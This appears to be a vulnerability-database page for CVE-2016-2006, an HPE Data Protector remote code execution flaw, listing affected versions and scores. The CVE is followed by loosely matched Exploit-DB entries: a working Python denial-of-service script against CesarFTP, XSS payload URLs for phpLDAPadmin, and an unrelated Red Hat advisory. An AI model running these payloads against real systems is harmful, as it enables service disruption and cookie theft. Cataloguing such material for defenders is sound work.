CVE-2016-2006
Published 2016-04-21
Priority P269 · critical · 9.8 · CVSS 3.0
AV:N AC:L PR:N UI:N S:U C:H I:H A:H
EPSS: 20.41% (97.2th percentile)
HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allows remote attackers to execute arbitrary code via unspecified vectors, aka ZDI-CAN-3353.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | data_protector | >= 7.0 < 7.03_108 | 7.03_108 |
| hp | data_protector | >= 8.0 < 8.15 | 8.15 |
| hp | data_protector | >= 9.0 < 9.06 | 9.06 |
CVSS provenance
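| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vendor_redhat | | 8.1 | HIGH | |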
GHSA
GHSA-jj58-9fp6-rq2w: HPE Data Protector before 7
ghsa_unreviewed·2022-05-14
CVE-2016-2006 [CRITICAL] GHSA-jj58-9fp6-rq2w: HPE Data Protector before 7
HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allows remote attackers to execute arbitrary code via unspecified vectors, aka ZDI-CAN-3353.
Red Hat
perl-DBD-MySQL: Use after free when using prepared statements
vendor_redhat·2016-11-18·CVSS 8.1
CVE-2016-1251 [HIGH] CWE-416 perl-DBD-MySQL: Use after free when using prepared statements
perl-DBD-MySQL: Use after free when using prepared statements
There is a vulnerability of type use-after-free affecting DBD::mysql (aka DBD-mysql or the Database Interface (DBI) MySQL driver for Perl) 3.x and 4.x before 4.041 when used with mysql_server_prepare=1.
Mitigation: This problem is only exposed when the user uses server-side prepared statement support (mysql_server_prepare=1), which is NOT default behavior and was turned off back for all drivers per MySQL AB decision in 2006 due to issues with server-side prepared statements in the server.
Use the default driver setting which uses emulated prepared statements.
Package: perl-DBD-MySQL (Red Hat Enterprise Linux 5) - Will not fix
Package: perl-DBD-MySQL (Red Hat Enterprise Linux 6) - Will not fix
Package: perl-DBD-MySQL (Red Ha
No detection rules found.
Exploit-DB
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
exploitdb·2016-11-01
CVE-2006-0441 KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
---
```python
#!/usr/bin/python
#-*- coding: utf-8 -*-
### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ###
# Date: 2016-01-11
# Exploit Author: n30m1nd
# Vendor Homepage: http://www.karjasoft.com/
# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe
# Version: 2.0.2
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# Thanks to PHRACK for maintaining all the articles up for so much time...
# These are priceless and still current for exploit development!!
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Open Sami FTP Server and open its graphical interface
# * Run this python script and write
```
Exploit-DB
CesarFTP 0.99g - XCWD Denial of Service
exploitdb·2016-01-19
CVE-2006-2961 CesarFTP 0.99g - XCWD Denial of Service
CesarFTP 0.99g - XCWD Denial of Service
---
```python
#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Exploit Title : CesarFTP 0.99g -(XCWD)Remote BoF Exploit
# Discovery by : Irving Aguilar
# Email : [email protected]
# Discovery Date : 18.01.2016
# Tested Version : 0.99g
# Vulnerability Type : Denial of Service (DoS)
# Tested on OS : Windows XP Professional SP3 x86 es
import socket
buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
target = '192.168.1.73'
port = 21
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target, port))
print '[*] Target: ' + target
print '[*] Port: ' + str(port)
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send( buffer + '\r\n')
print '[+] Buffer sent'
s.close()
```
Exploit-DB
phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting
exploitdb·2006-04-21
CVE-2006-2016 phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/search.php?server_id=0&search=true&filter=objectClass%3D%2A&base_dn=cn%3Dtoto%2Cdc%3Dexample%2Cdc%3Dcom&form=advanced&scope=%22%3Cscript%3Ealert('r0t')%3C/script%3E
Exploit-DB
phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting
exploitdb·2006-04-21
CVE-2006-2016 phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/template_engine.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E
Exploit-DB
phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting
exploitdb·2006-04-21
CVE-2006-2016 phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/compare_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E
Exploit-DB
phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting
exploitdb·2006-04-21
CVE-2006-2016 phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/rename_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E
Exploit-DB
phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting
exploitdb·2006-04-21
CVE-2006-2016 phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting
phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/17643/info
PHPLDAPAdmin is prone to multiple input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary HTML and script code in the browser of a victim user in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user, and to launch other attacks.
http://www.example.com/copy_form.php?server_id=0&dn=%22%3Cscript%3Ealert('r0t')%3C/script%3E
http://www.securitytracker.com/id/1035631
http://www.zerodayinitiative.com/advisories/ZDI-16-246
https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05085988
Published: 2016-04-21